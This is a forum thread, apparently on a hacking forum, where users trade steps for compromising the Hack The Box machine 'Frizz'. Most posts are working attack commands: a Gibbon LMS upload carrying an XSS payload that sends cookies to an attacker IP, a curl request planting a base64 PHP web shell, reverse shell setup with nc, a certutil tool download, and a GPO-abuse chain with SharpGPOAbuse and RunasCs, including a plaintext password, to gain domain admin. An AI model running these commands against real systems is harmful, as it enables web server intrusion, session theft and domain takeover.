[kkghr12341337777]

Tks for your writeup

---

Tks for your writeup

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[tankist0x01]

yep gtrngweuifniw

[1540935409]

可以阅读这篇文章 https://github.com/dgoorden/CVE-2023-45878使用py脚本 直接获取反向shell 很方便

---

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nc -lvnp XXX

Im running around trying to find a user flag

我阅读了相关的POC但是我在bp发包之后提示Your request failed due to an attachment error. 好像并没有成功 相反我使用github上的漏洞脚本拿到了反弹shell

[bkbk]

Can someone confirm if RunasCS works? I am not able to add myself in the local admins group with GPO

Just worked for me...  Below are the steps someone else posted earlier which I just ran and worked flawlessly.
I guess the only other possibility is the binaries in question...
wget https://github.com/byronkg/SharpGPOAbuse...OAbuse.exe
wget https://github.com/antonioCoco/RunasCs/r...unasCs.zip (then used the RunasCs.exe from this zip)

# get root
New-GPO -Name "doesnotmatter"
#add newlink to domain controllers
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasC.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r IP:9001

Thank you. I wound up getting it, the binary had compiled funky so had to redo it to make sure it was working right. PS Alaways check your freshly compiled binaries I lost maybe an hour to this lol

---

Can someone confirm if RunasCS works? I am not able to add myself in the local admins group with GPO

Just worked for me...  Below are the steps someone else posted earlier which I just ran and worked flawlessly.
I guess the only other possibility is the binaries in question...
wget https://github.com/byronkg/SharpGPOAbuse...OAbuse.exe
wget https://github.com/antonioCoco/RunasCs/r...unasCs.zip (then used the RunasCs.exe from this zip)

# get root
New-GPO -Name "doesnotmatter"
#add newlink to domain controllers
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasC.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r IP:9001

Thank you. I wound up getting it, the binary had compiled funky so had to redo it to make sure it was working right. PS Alaways check your freshly compiled binaries I lost maybe an hour to this lol

[Bogdi4u]

Hello guys!
How did you guys uploaded things? Cause i'm using certutil, got an 200 response on my server, but no exes uploaded on my directory.

PS C:\Temp> certutil -urlcache -f http://x.x.x.x:6666/RunasCs.zip C:\Temp\
**** Online ****


CertUtil: -URLCache command completed successfully.